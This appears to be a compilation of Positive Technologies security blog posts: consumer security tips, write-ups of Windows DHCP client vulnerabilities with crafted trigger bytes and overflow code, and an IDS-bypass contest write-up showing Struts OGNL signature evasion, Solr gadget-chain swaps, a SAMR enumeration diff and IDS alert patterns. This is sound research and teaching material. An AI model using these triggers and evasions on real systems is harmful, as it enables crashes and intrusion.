An attack is not always launched from the outside. In many cases confidential data is stolen by an internal attacker. According to a study by Positive Technologies, 100 percent of such attacks result in full control over the network. Employees contribute to this by mishandling passwords. Recently many companies have implemented password policies requiring users to change their passwords regularly and make them complex enough. But many people don't want to memorize a complex password, so they often write it down on paper and keep it next to their computer. In this case an attacker easily gets access to the employee's account.

Solution: never keep passwords in cleartext. If you want to write down a password, use the method suggested by Bruce Schneier, where instead of your password you write down some clues which will help you recall it.

Conclusion


The human factor is one of the main issues in ensuring the security of corporate systems. More and more often, attackers choose to slip into the corporate network by attacking employees, rather than hacking into the infrastructure directly from outside the perimeter.

To prevent attackers from getting inside your company's infrastructure, follow the basic information security rules. Do not follow suspicious links, be careful when downloading email attachments, don't provide important information over the phone, and don't store passwords in cleartext.


Protecting Money On The Internet. Five Tips To Secure Your Online Transactions

Image credit: Unsplash
According to Positive Technologies research data, the security of financial applications keeps improving. Banks make serious investments into improving the security of their products. In the end, hackers find it easier not to attack the banks themselves, but rather to go after bank clients and online shoppers.

Here are some useful tips from Positive Technologies experts to help you protect your money online.

Make transactions only using secure sites


A basic rule of online payment security is to never use your cards on untrusted sites. If you have used a service for a long time and feel sure it is safe, you can make a transaction, but you should still stay cautious. For instance, check for encryption: data must be transmitted via HTTPS, a secure protocol, rather than via plain HTTP.

Often attackers create copies of trusted sites, and sometimes such resources may be even higher in the search results than the original sites. That's why it is important to remember the exact URL of the resource you need and type that into your browser's address bar, rather than use a search engine. The best option is to add your bank's site or the site where you make a payment to your browser's bookmarks. Before you make any transaction, double-check the URL. It must not contain any extra symbols or replaced symbols (1 instead of I, for instance).

Get a separate card for online shopping


Using your primary card for online shopping is a bad idea. If that card is compromised, attackers could steal a lot. So it's better to use a special card where you keep a small amount, ideally transferring funds right before the transaction. Another option is to set a daily limit for operations with the card in your online bank settings. Then, even if an attack is successful, the hackers won't be able to steal all your money at once.

Some banks allow creating virtual cards for online shopping. That's a good function to use, if available.

Beware of phishing


Financial institutions nowadays make serious investments into improving security. They perform audits, use new software and hardware to detect attacks. Often the attackers find it easier to attack bank clients than the bank itself.

One of the most efficient forms of such attacks is phishing. Hackers may send letters to bank clients, allegedly from the bank's staff, and it is not so easy to tell at a glance whether such a letter is fake. Remember the key rule: if a communication claims to be from your bank, call the number on the back of your card to get clarification from the bank's personnel and confirm the request.

Control security of your devices


In addition to phishing, hackers can attack devices of the bank clients, too. To keep your computer and gadgets secure, make a habit of never downloading files from untrusted sites, never following suspicious links, and never downloading attachments from unknown senders.

When you launch a new app, check and analyze the permissions it requests. If a regular game wants access to your phone book, that should get you wondering why the app developers would need it.

Using antivirus on all computers and gadgets you use for online banking and online purchases is a must. Keep the programs on those devices updated. Often hackers get into a computer through vulnerabilities in obsolete software. Regular updates reduce the probability of such attacks.

Do not make online purchases from someone else's devices or over public Wi-Fi


Using someone else's computer for online payments is risky. There's no way to know what viruses may be found in a computer, for instance, in a cybercafe. Don't log into your online bank using public Wi-Fi, either. Your data can be easily intercepted by hackers.


DHCP security in Windows 10: analyzing critical vulnerability CVE-2019-0726

Image credit: Pexels
When the January updates for Windows were released, the public was alarmed by news of critical vulnerability CVE-2019-0547 in DHCP clients. The heat was stirred up by the high CVSS score and by the fact that Microsoft did not release an Exploitability Index assessment right away, which made it harder for users to decide whether they needed to update their systems immediately. Some publications even speculated that the absence of the Exploitability Index pointed to the appearance of a usable exploit in the near future.

Solutions such as MaxPatrol can identify which computers on a network are vulnerable to certain attacks. Other solutions detect such attacks. For these solutions to work, we need to describe both the rules for identifying vulnerabilities in products and the rules for detecting attacks on those products. This, in turn, is possible only if for each separate vulnerability we figure out the vector, method, and conditions of exploitation: in other words, all the details and nuances. This requires a much deeper and fuller understanding than what can usually be found in descriptions on vendors' sites or in CVE entries, for example:

The reason for the vulnerability is that the operating system incorrectly handles objects in memory.

So, to update our products with rules for detecting attacks targeting the newly discovered vulnerability in DHCP and rules for identifying affected devices, we needed to dive into all the details. With binary vulnerabilities, one can often get to the faults lying at their root by using patch-diff, which compares and identifies the changes to the binary code of an app, a library, or an operating system's kernel made by a specific patch or update fixing the error. But Step 1 is always reconnaissance.

Note: To go directly to the vulnerability description, without reading the DHCP concepts it's based on, you can skip the first several pages and go straight to the section titled "DecodeDomainSearchListData function".

Reconnaissance

Go to a search engine and go through everything currently known about the vulnerability. This time there's not much detail, and most of it is information recycled from the original publication on the MSRC site. This situation is typical for errors found by Microsoft during an internal audit.

From the publication, we find that we are dealing with a memory corruption vulnerability present in both client and server systems running Windows 10 version 1803, and that it manifests when an attacker sends specially crafted responses to the DHCP client. A couple of days later, the page also received Exploitability Index ratings:


As we can see, MSRC gave a rating of 2 — Exploitation Less Likely. This means the error is very likely either non-exploitable, or exploiting it is so difficult that it would require too much effort. Admittedly, Microsoft does not have a habit of lowballing such scores. This is partly due to reputational risks, as well as the relative independence of the response center within the company. So let's assume that if exploitation is indicated as unlikely, that is probably true. We could finish the analysis then and there. But it's always a good idea to double-check and at least see what exactly the vulnerability was. While vulnerabilities may be diverse, they also tend to reoccur and pop up in other places.

On the same site we download the patch (security update) provided as an .msu archive, unpack it, and look for the files most likely to be related to client-side processing of DHCP responses. Lately this has become more difficult. Updates are now provided not as separate packages fixing specific errors, but as a single package containing all monthly fixes. This increases the number of unrelated changes that we must wade through to find what truly interests us.

In the plethora of files, our search turns up several libraries matching the filter, and we compare these with their versions on an unpatched system. The dhcpcore.dll library looks the most promising of all. Meanwhile BinDiff shows minimal changes:


In fact, more or less significant changes are made only to one function — DecodeDomainSearchListData. If you are well familiar with the DHCP protocol and its rarely used functions, you already have an idea of what list is handled by that function. If not, we move to Step 2: reviewing the protocol.

DHCP and its options

DHCP (RFC 2131 | wiki) is an extensible protocol whose extensibility is implemented by means of the options field. Each option is described by a unique tag (number, identifier), size of the data contained in the option, and the data itself. This practice is typical for network protocols, and one of these options "implanted" in the protocol is Domain Search Option, which is described in RFC 3397. It allows a DHCP server to set standard domain name endings on clients. Those will be used as DNS suffixes for connections set up in this way.

For example, let's say that on our client we have set the following name endings:

.microsoft.com
.wikipedia.org



Then, in any attempt to determine address by domain name, these endings will be plugged in to DNS requests one by one, until a match is found. For instance, if the user types ru in the browser address bar, DNS requests will be formed first for ru.microsoft.com and then for ru.wikipedia.org:


In fact, modern browsers are too smart and react to such short names by redirecting to a search engine, so we will instead show the output of less "thoughtful" utilities:



The reader might think this is the essence of the vulnerability: in itself, the ability to alter DNS suffixes via a DHCP server is a threat to any client requesting network parameters over DHCP, given that any device on the network can pose as such a server. But that's not all: as evident from the RFC, this is quite legitimate, documented behavior. A DHCP server is, in effect, a trusted component able to impact the devices that connect to it.

Domain Search option

The Domain Search Option number is 0x77 (119). As with all other options, it is coded by a single-byte tag with option number. And like most options, the tag is followed by a single-byte size of the data following the size. A DHCP message can contain more than one copy of the option. In this case, data from all such sections is concatenated in the same order as in the message.


In the example taken from RFC 3397 the data is divided into three sections of 9 bytes each. As seen from the picture, subdomain names in the full domain name are coded with a single-byte name length, followed by the name itself. The full domain name code ends in a null byte (null size of the subdomain name).

Also, the option uses the simplest data compression method: reparse points. Instead of a domain name size, the field might contain 0xc0; the next byte then establishes the offset, relative to the start of the option data, at which parsing of the domain name continues.
So, in our example, we have a coded list of two domain suffixes:

.eng.apple.com
.marketing.apple.com
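
To make the wire format concrete, here is a small standalone decoder sketch (our own illustration, not the Windows implementation; no guard against pointer loops), run on the RFC 3397 example:

def decode_search_list(data):
    """Decode a DHCP Domain Search option payload (RFC 3397) into a suffix list."""
    suffixes, pos = [], 0
    while pos < len(data):
        labels, cur, jumped = [], pos, False
        while True:
            b = data[cur]
            if b == 0xC0:                  # compression pointer
                if not jumped:
                    pos = cur + 2          # the entry ends after the 2-byte pointer
                    jumped = True
                cur = data[cur + 1]        # continue parsing at the given offset
            elif b == 0:                   # null size: end of this domain name
                if not jumped:
                    pos = cur + 1
                break
            else:                          # plain label: <size><characters>
                labels.append(data[cur + 1:cur + 1 + b].decode("ascii"))
                cur += 1 + b
        suffixes.append(".".join(labels))
    return suffixes

# RFC 3397 example: "eng.apple.com", then "marketing" plus a pointer to offset 4
data = bytes.fromhex("03656e67056170706c6503636f6d00"
                     "096d61726b6574696e67c004")
print(decode_search_list(data))  # ['eng.apple.com', 'marketing.apple.com']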

DecodeDomainSearchListData function

The DHCP option with number 0x77 (119) allows the server to set DNS suffixes on clients. But not on computers with Windows operating systems. Microsoft systems have traditionally ignored this option, so historically endings of DNS names were applied using group policies, when necessary. But things changed recently, when the new release of Windows 10 version 1803 introduced handling for Domain Search Option. As follows from the function name in dhcpcore.dll that was changed, it is the added handler itself that contains the error.

Now let's get to work. Comb the code a little, and here's what we find. The DecodeDomainSearchListData procedure, as one might guess, decodes data from the Domain Search Option of the message received from the server. As input, it takes a data array packed as described earlier, and it outputs a null-terminated string containing a list of domain name endings separated by commas. For instance, the function will transform the data from the above example into the following string:

eng.apple.com,marketing.apple.com

DecodeDomainSearchListData is called from the UpdateDomainSearchOption procedure, which writes the returned list to the "DhcpDomainSearchList" parameter of the registry key:

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{INTERFACE_GUID}\

which stores the main parameters for the specific network interface.


The DecodeDomainSearchListData function makes two passes. On the first pass, it performs all actions except making an entry to the output buffer. So the first pass is for calculating the size of memory needed to hold the returned data. On the second pass, memory is allocated for that data and the allocated memory is filled. The function is not too big—about 250 instructions—and its main job is to handle each of the three possible variants of the character in the incoming stream: 1) 0x00, 2) 0xc0, or 3) all other values. The fix for the error related to DHCP boils down to adding a check of the size of the resulting buffer at the start of the second pass. If the size is zero, memory is not allocated for the buffer, and the function completes execution and returns an error:


So the vulnerability shows itself only when the size of the target buffer is zero. And in the very beginning the function checks its inputs, whose size cannot be less than two bytes. Therefore, exploitation requires finding a non-empty domain suffix option formed in such a way that the size of the output buffer equals zero.

Exploitation

The first thing that comes to mind is using the reparse points to make sure that non-empty input data generates an empty string of output:
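
One way to encode such an option (hypothetical bytes; the single list element is just a pointer to a null byte):

# Option data: three bytes of input (passes the minimum-size check),
# yet the only list element is a pointer to the null byte at offset 2,
# so the decoded output is an empty string of zero length.
option_data = bytes([0xC0, 0x02, 0x00])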



A server set up to respond with an option with such content will indeed cause an access violation on non-updated clients. Here is why. At every step, when the function parses part of the full domain name, it copies that part into the target buffer and appends a period. In this example from the RFC, the following data will be copied to the buffer in the following order:

1). eng.

2). eng.apple.

3). eng.apple.com.

Then, when the zero domain size is encountered in the input data, the function changes the previous character in the target buffer from a period to a comma:

4). eng.apple.com,

and keeps parsing:

5). eng.apple.com,marketing.

6). eng.apple.com,marketing.apple.

7). eng.apple.com,marketing.apple.com.

8). eng.apple.com,marketing.apple.com,

When input data ends, all that's left is replacing the last comma with a null character, and here's a string ready to be written to the registry:

9). eng.apple.com,marketing.apple.com

What happens when the attacker sends a buffer formed as described? From the example we can see the list it contains is made of a single element — an empty string. On the first pass, the function calculates the output data size. Since the data does not contain any non-zero domain name, the size is zero.

On the second pass, a heap memory block is allocated for the data and the data is copied. But the parsing function immediately encounters the null character indicating the end of the domain name, so, as explained before, it changes the previous character from a period to a comma. And then we have a problem. The target buffer iterator is set to zero. There's no previous character. The previous character belongs to the header of the heap memory block. And this character will be changed to 0x2c, which is a comma.

However, this happens only on 32-bit systems. Using an unsigned int to store the current position of the target buffer iterator changes the behavior on x64 systems. Let's look more closely at the fragment of code responsible for writing the comma to the buffer:


One is subtracted from the current position using the 32-bit register eax, but when addressing the buffer, the code uses the full 64-bit register rax. On the AMD64 architecture, any operation on a 32-bit register zeroes out the upper half of the corresponding 64-bit register. This means that the rax register, which used to contain zero, will after the subtraction hold 0xffffffff rather than -1. Therefore, on 64-bit systems the value 0x2c will be written at address buf[0xffffffff], way outside the memory allocated for the buffer.
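
The effect is easy to reproduce in isolation:

# The iterator is kept as a 32-bit value: subtracting one from zero
# wraps around instead of producing -1 (mirroring the eax/rax behavior).
pos = 0
idx = (pos - 1) & 0xFFFFFFFF  # what `sub eax, 1` leaves in the lower half of rax
print(hex(idx))               # 0xffffffff -> the write lands at buf[0xffffffff]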

These findings are consistent with Microsoft's exploitability assessment: to exploit this vulnerability, an attacker would have to learn to perform remote heap spraying against the DHCP client and control the heap layout well enough for the preset values (namely, the comma and the period) to land at a prepared address and cause a controllable adverse effect.

Otherwise, the write to an unchecked address simply crashes the svchost.exe process, along with all the services it happens to host at the moment, after which the operating system restarts them. That, too, is something attackers may use to their advantage if circumstances permit.

That would seem to be all there is to say about this error. And yet the feeling remains that we have not considered every possibility, that there is more here than meets the eye...

CVE-2019-0726

Most likely, that's the case. If we look closely at the kind of data causing the error and compare it with how exactly the error occurs, we can see that the list of domain names can be crafted so that the resulting buffer size is not zero, yet there is still an attempt to write outside of the buffer. For that to happen, the first element of the list must be an empty string, while the rest can contain ordinary domain names. For example:


The option contains two elements. The first domain suffix is empty: it ends immediately with a null byte. The second suffix is .ru. The calculated size of the output string is three bytes, which passes the check for an empty target buffer introduced in the January update. At the same time, the zero at the very beginning of the data forces the function to write a comma in place of the "previous" character of the resulting string, and since the current position in the string, as in the earlier example, is zero, the write lands outside the allocated buffer.
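
In wire format the trigger is tiny. Here is a hypothetical rendering of such an option body (our bytes, following the encoding described above):

/* Domain search list data of the kind that triggers CVE-2019-0726 */
const unsigned char search_list[] = {
    0x00,              /* 1st element: an empty domain name                */
    0x02, 'r', 'u',    /* 2nd element: the label "ru"...                   */
    0x00               /* ...and its terminator; output "ru," is 3 bytes,  */
};                     /* so the January zero-size check passes            */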

Now we need to confirm the theory in practice. We simulate a DHCP server that answers a client request with a message carrying the option just described, and we immediately catch an exception on an attempt to write a comma at position 0xffffffff of the buffer allocated for the resulting string:


Here register r8 contains a pointer to incoming options, rdi contains the address of the allocated target buffer, and rax contains the position in that buffer where the character must be written. These are the results we got on a system with all updates installed (as of January 2019).

We wrote to Microsoft informing them of the problem, and guess what? They lost our message. Yes, this sometimes happens even to the best and most reputable vendors. No process is perfect, and in such cases you need to find alternative channels of communication. A week later, having not received even an automated response, we made contact directly on Twitter. After several days of analysis it turned out that the details we sent had nothing to do with CVE-2019-0547 and actually constituted a separate vulnerability, due to receive a new CVE identifier. A month later, in March, a new patch was released, and the issue got its number: CVE-2019-0726.

So sometimes, when trying to figure out a 1-day vulnerability, you may accidentally stumble upon a 0-day, just by trusting your instincts.

Author: Mikhail Tsvetkov, Positive Technologies

How analyzing one critical DHCP vulnerability in Windows 10 led to discovery of two more

Image credit: Unsplash 
As described in our earlier article about CVE-2019-0726, sometimes a search for details of a known vulnerability leads to discovery of a new one. Sometimes even more than one.

The article touched upon two functions of the library dhcpcore.dll: UpdateDomainSearchOption, mentioned in passing, and DecodeDomainSearchListData, which is called by the former and was described in more detail. As always when hunting for vulnerabilities, even if the important findings boil down to just one or two functions, there is a lot more code to review first. Occasionally you notice small things that are irrelevant to the task at hand but may have significance of their own or prove useful later. Even if you have no time to dwell on them in the moment, your brain takes note, and they resurface when you finally get the chance to go back and check your guess.

This is exactly what happened this time. While researching DhcpExtractFullOptions, the function responsible for processing all options in the DHCP response from the server (among them the option handled by UpdateDomainSearchOption), one's attention is immediately drawn to two arrays on the stack, each 256 elements long:


And there is no sign of any check limiting the iterators of these arrays. At the time we were dissecting a different vulnerability, so this observation was not immediately relevant; all we could do was file that part of the code away for later.

Analysis

A few weeks later, we thought back to the DhcpExtractFullOptions function that had caught our attention earlier. We opened it in a disassembler, worked through the pieces of code that had not been fully analyzed, and set out to figure out what those two curious arrays were for.

When function execution begins, the arrays and their iterators are zeroed out:


The function parses all options in the packet received from the DHCP server, collecting and processing the information they carry. Based on the results of the parsing, it also logs the corresponding event via ETW (Event Tracing for Windows). Event logging is exactly where the buffers in question come into play: along with a lot of other data, they are passed to the EtwEventWriteTransfer procedure. Preparing all the data for logging takes a lot of work that is not very relevant to the vulnerability under discussion, so we will skip those examples.

More important is how those buffers get filled, which happens inside the option parsing loop. First, ParseDhcpv4Option, a function with a self-explanatory name, is called for the current option. It either fills fields of the dhcp_pointers object with the received data or makes a note of an unknown option when it encounters an identifier for which there is no handler.


On return from ParseDhcpv4Option, the identifier of the current option, option_tag, is written to the next element of all_tags, the first of the two arrays we are looking at. If the function encountered an unknown option and therefore did not set the is_known_option flag, the identifier is also written to the next element of the second array, unknown_tags. (Of course, the variables mentioned in this article received meaningful names only after code analysis.)

So the all_tags array stores the tags of all options from the received message, while unknown_tags holds only the tags of options unknown to the parser. Neither array index is checked anywhere, so the indices can exceed 256, causing writes beyond the memory allocated for the arrays on the stack. To overflow the first array, it is enough for the DHCP server to send a packet with more than 256 options. The same holds for the second array, with the one difference that the options must be ones the client cannot handle.
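
Put together, the pattern looks roughly like this sketch; it is a reconstruction under names of our own, not Microsoft's code:

#include <stddef.h>

/* Reconstructed sketch of the flaw in DhcpExtractFullOptions. */
struct dhcp_option { unsigned char tag; /* value, length, ... */ };

static void parse_dhcpv4_option(const struct dhcp_option *opt, int *is_known)
{
    /* fills dhcp_pointers fields for known tags, clears the flag otherwise */
    *is_known = (opt->tag <= 76);            /* placeholder for the real test */
}

void extract_full_options(const struct dhcp_option *opts, size_t count)
{
    int all_tags[256];                       /* 256 elements each...          */
    int unknown_tags[256];
    size_t n_all = 0, n_unknown = 0;

    for (size_t i = 0; i < count; i++) {
        int is_known = 0;
        parse_dhcpv4_option(&opts[i], &is_known);
        all_tags[n_all++] = opts[i].tag;             /* no bounds check       */
        if (!is_known)
            unknown_tags[n_unknown++] = opts[i].tag; /* no bounds check here  */
    }                                        /* count > 256 writes past the   */
}                                            /* arrays on the stack           */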

Exploitation

Now let's test our theoretical conclusions in practice. First note that an option tag is one byte, while the array elements are of type int, four bytes each. So we have an overflow in which we control every fourth byte, and the remaining bytes are zeroed out by the overwrite.


The easiest way to test the assumption is to overwrite the function's security cookie stored on the stack, which triggers a security-check exception. Let's simulate a DHCP server that sends enough options to cause the overwrite: say, 0x1a0 (416) options with identifier 0xaa and zero length. Each option then occupies two bytes, and the total size of the packet with all headers is about 1100-1200 bytes. This fits within the Ethernet MTU, so we have reason to believe the message will not be fragmented, sparing us that complication.
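
Building the option buffer for that experiment is trivial; a sketch of ours:

#include <stddef.h>

/* Fill buf with 0x1a0 zero-length options, tag 0xaa, two bytes each:
 * 832 bytes of options; with the DHCP, UDP, and IP headers the reply
 * stays around 1.1 KB, safely under the Ethernet MTU. */
size_t fill_overflow_options(unsigned char buf[0x1a0 * 2])
{
    for (size_t i = 0; i < 0x1a0; i++) {
        buf[2 * i]     = 0xaa;   /* option tag              */
        buf[2 * i + 1] = 0x00;   /* option length (no data) */
    }
    return (size_t)0x1a0 * 2;
}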

We send the packet formed this way in response to a request from the DHCP client and on the client's computer we capture an exception in the respective svchost.exe process:


As we can see from the stack trace, option identifiers from our packet overwrote both the stack cookie and the return address for the function.

Of course, building a usable exploit from this fault would take significant effort. On modern systems, a stack buffer overflow is complex and hard to exploit because of all the mitigation mechanisms. On the other hand, those mechanisms protect return addresses and exception handlers from being overwritten, prevent code execution in memory not intended for it, and make addresses hard to predict; they can do nothing, for instance, against the overwriting of local variables stored on the stack between the overflowing buffer and the return address. And DhcpExtractFullOptions keeps several potentially dangerous variables in exactly that range.

We wrote to Microsoft again to report the bug we had found. After some correspondence and about a week of analysis, we received a response: a CVE identifier was being prepared for the vulnerability, a patch was scheduled for March, and the vulnerability had already been reported to Microsoft by someone else. This is not very surprising: the flaw lies out in the open, and buffers with unchecked indices are always the first thing to draw attention; quite often they can even be found by automated analysis.

In March, as promised, a patch was released for the fault, now identified as CVE-2019-0697. The researcher who had reported it earlier turned out to be Mitch Adair, the same Microsoft employee who found the DHCP vulnerability CVE-2019-0547, fixed in January.

Author: Mikhail Tsvetkov, Positive Technologies

Four ways to phish: how to avoid falling for scammers' bait


Phishing is one of the main cybersecurity threats targeting Internet users. Today we will describe how these attacks work and how not to become a victim.

Emails from trusted companies

Attackers often target customers of a particular company. They impersonate that company and reach out to its customers, asking them to click a link to a fake website, where they are tricked into entering their credentials.

In the case of financial services, hackers can steal money from victims' accounts. Such attacks are conducted regularly. In one all too typical case a few years back, attackers hit users of MyEtherWallet, a popular cryptocurrency wallet. Users received an email claiming that their accounts had been blocked due to a software update and that they had to click a link to regain access.

Trusting users landed on a website identical to the original myetherwallet.com. The only difference was that the last letter "t" in the URL had been replaced by a visually similar Unicode character ("ţ").


Such a tiny detail does not usually catch the eye, so one must always stay vigilant. Even if a message seems to come from a company you know, be careful about clicking links. If you have any doubt about whether an email is legitimate, contact the company right away via a phone number or email address indicated on the official website. And if you need to go to a page often, bookmark it instead of accessing it via email links.

Attacks via corporate email

Fake domains are a simple and effective phishing tool. But criminals keep inventing more sophisticated techniques, one of which is using employee email addresses to conduct attacks. In such cases, hackers are usually targeting an entire organization. To gain a foothold in a company's infrastructure, they might send emails posing as contractors or colleagues.

They spice up messages with enticing subject lines—"bonuses," "reward," "wage increase," "vacation"—to immediately catch the attention of employees, who then download malicious attached files.


The Cobalt group has used such phishing messages as an initial vector in attacks on infrastructure. In some cases, the messages were sent from the addresses of employees of real banks and integrators whose infrastructure had been hacked. The messages usually arrived during working hours and looked quite credible.

To avoid falling victim to such attacks and letting attackers into the company network, employees should think twice before opening each message. Are you supposed to receive lists of employees' wages? Why did you get this message? If in doubt, do not download the attached file; instead, show it to an IT or security specialist.

Attacks on social media profiles

Email is not the only way in for attackers, who increasingly target social media profiles. Social networks enable attackers to reach out to employees of a target company. If hackers manage to infect a device from which a victim connects to corporate Wi-Fi, they will be able to penetrate the corporate network.

Users with poor security awareness may use social networks to discuss business issues or even send sensitive documents. Even worse, employees sometimes use the same (or very similar) password for social networks and their work accounts.

This has worked to the advantage of the SongXY group, which participated in attacks against industrial companies and government institutions in CIS countries in 2017. The attackers surfed social networks for profiles of employees and sent messages to them.

A security assessment by Positive Technologies revealed that over 70 percent of tested employees responded to emails from potential attackers, and 21 percent followed unsafe links.

Social networks should not be used to discuss work issues, especially with strangers. Nor are they a good place to send or receive sensitive files.

Phone phishing

Hackers do not limit themselves to just the Internet when attacking home users and employees. Phone conversations remain one of the simplest, tried-and-true instruments for social engineering.

The Internet is full of stories about clients who were called by someone supposedly from their bank, who tricked them into revealing their account credentials or a one-time code from an SMS message.

On occasion, office employees receive calls from "technical support staff" who request credentials used to access various programs or persuade the employees to open malicious links. A classic example: an attacker calls early Sunday morning and offers the employee a choice. Something has gone wrong, so the employee must either come to the office ASAP or simply give the username and password to the caller so the "support staff" can deal with the issue on their own.

By catching victims unaware and taking advantage of their momentary confusion, an attacker can obtain information of interest or trick users into performing certain actions. It is vital to remember that such attacks can and do happen. Do not rush to follow instructions just because someone claims to be from the bank or technical support. Real bank employees never ask for your usernames or passwords, and they do not ask for one-time codes from SMS messages.

IDS Bypass contest at PHDays: writeup and solutions

Positive Hack Days 2019 included our first-ever IDS Bypass competition. Participants had to study a network segment of five hosts, and then either exploit a service vulnerability or meet a particular criterion (for example, send a certain HTTP response) in order to get a flag. Finding an exploit was easy, but the IDS complicated things as it stood between the participants and the hosts, checking every network packet. When a signature blocked the connection, participants were informed via the dashboard. Here are details on the tasks and the ways to solve them.



100.64.0.11 – Struts

More participants solved the Struts task than any of the others. After a port scan with Nmap, you find Apache Struts on port 8080.

# nmap -Pn -sV -p1-10000 100.64.0.11
631/tcp  open  ipp     CUPS 2.1
8005/tcp open  mxi?
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1


Using an Apache Struts vulnerability from 2017, an attacker could perform OGNL injection to obtain remote code execution (RCE). An exploit is available (such as on GitHub) but the IDS easily detects it:

[Drop] [**] [1:1001:1] Apache Struts2 OGNL inj in header (CVE-2017-5638) [**] 

The code of the signature is not available to participants, but the log messages make clear how it works. In this case, the signature detected OGNL injection in an HTTP header:

GET /showcase.action HTTP/1.1
Accept-Encoding: identity
Host: 100.64.0.11:8080
Content-Type: %{(#_='multipart/form-data')...

Studying the behavior of the IDS, it becomes clear that it reacts to the combination %{ at the beginning of the Content-Type header. There are several ways around this:


  1. @empty_jack tried separating the %{ symbols using his own dictionary for fuzzing, arriving at a solution with the string Content-Type: %${.
  2. Fuzzing the HTTP request itself. @c00lhax0r found that a null byte at the beginning of the header will also slip past the IDS: Content-Type: \0${.
  3. Most exploits for CVE-2017-5638 perform the injection with a percent sign. However, researchers who studied this and earlier Apache Struts vulnerabilities have shown that the injection can just as easily start with $. The combination ${ therefore bypasses the IDS signature and executes code on the system. This was the solution we originally had in mind.

This task was the easiest one: eight participants found a solution.

100.64.0.10 – Solr

Port 8983 hosted an Apache Solr server (written in Java).

$ nmap -Pn -sV -p1-10000 100.64.0.10
22/tcp   open  ssh     (protocol 2.0)
8983/tcp open  http    Jetty


Finding an exploit for Apache Solr 5.3.0 is easy: CVE-2019-0192, which lets an attacker spoof the address of the RMI server in a collection. Exploitation requires the ysoserial framework, which generates chains of Java objects (gadgets) and delivers them in various ways, for instance from a JRMP server.

Of course, going ahead and using the exploit without finessing it first will just trigger the IDS:

[Drop] [**] [1:10002700:3001] ATTACK [PTsecurity] Java Object Deserialization RCE POP Chain (ysoserial Jdk7u21) [**]

Jdk7u21 is just one of about 30 possible payloads. The choice of payload depends on the libraries used by the vulnerable service: the Jdk7u21 gadget chain uses only standard classes from Java Development Kit (JDK) version 7u21, while the CommonsCollections1 chain relies on classes from the widely used Apache Commons Collections 3.1.

An attacker can replace the RMI server address in a Solr collection with a different one and then launch the JRMP server. Solr requests an object from the attacker-indicated address and receives a malicious Java object. After the object is deserialized, its code is executed on the server.

The signature is triggered by the sequence of classes in the serialized Java object. Here is how the object, as sent from the attacker's computer, begins in the traffic:


The solution to this task was simple: the signature explicitly names Jdk7u21, so you had to try other gadget chains, say one from CommonsCollections, for which the IDS had no signatures. The participant would then get a shell on the system and read the flag. Five participants completed this task.

100.64.0.12 – SAMR

This was one of the trickiest and most interesting tasks. The target is a Windows computer with open port 445. The flag was split between two usernames, so completing the task required enumerating the Windows users.

Naturally, MS17-010 and other exploits did not work on this computer. The list of users could be obtained with scripts, such as those from Nmap or Impacket:

$ python samrdump.py 100.64.0.12
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Retrieving endpoint list from 100.64.0.12
[*] Trying protocol 445/SMB…
Found domain(s):
 . SAMR
 . Builtin
[*] Looking up users in domain SAMR
[-] The NETBIOS connection with the remote host timed out.
[*] No entries received.

Both scripts send DCERPC requests to the computer on port 445. But things weren't so simple: some packets are blocked by the IDS, triggering not one but two signatures:

[**] [1:2001:2] SAMR DCERPC Bind [**]
[Drop] [**] [1:2002:2] SAMR EnumDomainUsers Request [**]

The first signature detects the connection to SAMR and flags the TCP connection. The second signature is triggered by the SAMR EnumDomainUsers request. SAMR provides other ways to get the list of users: QueryDisplayInfo, QueryDisplayInfo2, and QueryDisplayInfo3. All these, too, were blocked by signatures.

The DCERPC protocol and Windows services expose a large number of remote administration features, and most well-known tools, such as PsExec and BloodHound, rely on DCERPC. SAMR, the Security Account Manager (SAM) Remote Protocol, allows working with accounts on a host, including enumerating the user list.

To make an EnumDomainUsers request, here's what Impacket does:


A DCERPC connection to SAMR is established over SMB, and all subsequent requests are sent in the SAMR context. Signatures are triggered by the first and last packets in the screenshot.

In the contest, two clues were given for this task:

  • Your attempts cause the IDS to generate 2 alerts. Look closely at the first.
  • Which connection commands for this protocol do you know?

The idea was to get participants thinking about DCERPC and its different connection methods. Among the PDUs available for connecting and changing context, we find the Bind and Alter Context commands. Alter Context allows changing the current context without interrupting the connection.

To get a solution, you needed to rework the samrdump script:

  1. Bind to a different service, such as with UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5.
  2. Use Alter Context to switch to SAMR.
  3. Make an EnumDomainUsers request.

All the changes fit in just three lines:

<         dce.bind(samr.MSRPC_UUID_SAMR)
---
>         dce.bind(uuid.uuidtup_to_bin(("3919286a-b10c-11d0-9ba8-00c04fd92ef5", "0.0")))
>         dce.alter_ctx(samr.MSRPC_UUID_SAMR)
>         dce._ctx = 1

There's also another solution, proposed by contest winner @psih1337. EnumDomainUsers returns the list of users sorted by SID (security identifier) rather than by name. And a SID is not a random number: for instance, the SID of the LocalSystem account is S-1-5-18, while groups and users created manually get a last component (the RID) of 1000 or greater.

So by manually bruteforcing SIDs ending in 1000 through 2000, you are very likely to find the accounts you're looking for. In our case, they were 1008 and 1009.

This task required an understanding of the DCERPC protocol and some experience in surveying Windows infrastructure. @psih1337 was the only person to solve this task.

100.64.0.13 – DNSCAT

Port 80 hosts a web page with a form for entering an IP address.



If you type in your own IP address, port 53 starts receiving UDP traffic like this:

17:40:45.501553 IP 100.64.0.13.38730 > 100.64.0.187: 61936+ CNAME? dnscat.d2bc039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173)
17:40:45.501639 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209
17:40:46.520457 IP 100.64.0.13.38730 > 100.64.0.187: 21842+ TXT? dnscat.7f4e039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173)
17:40:46.520546 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209

It's clearly DNSCAT, a DNS tunneling tool. When you type an IP address into the form, the DNSCAT client attempts to connect to that address. If the attempt succeeds, the server (that is, the participant) gets a shell on the contest computer and can collect the flag.

Naturally, if we simply try to raise the DNSCAT server and accept the connection, no such luck:

[Drop] [**] [1:4001:1] 'dnscat' string found in DNS response [**]

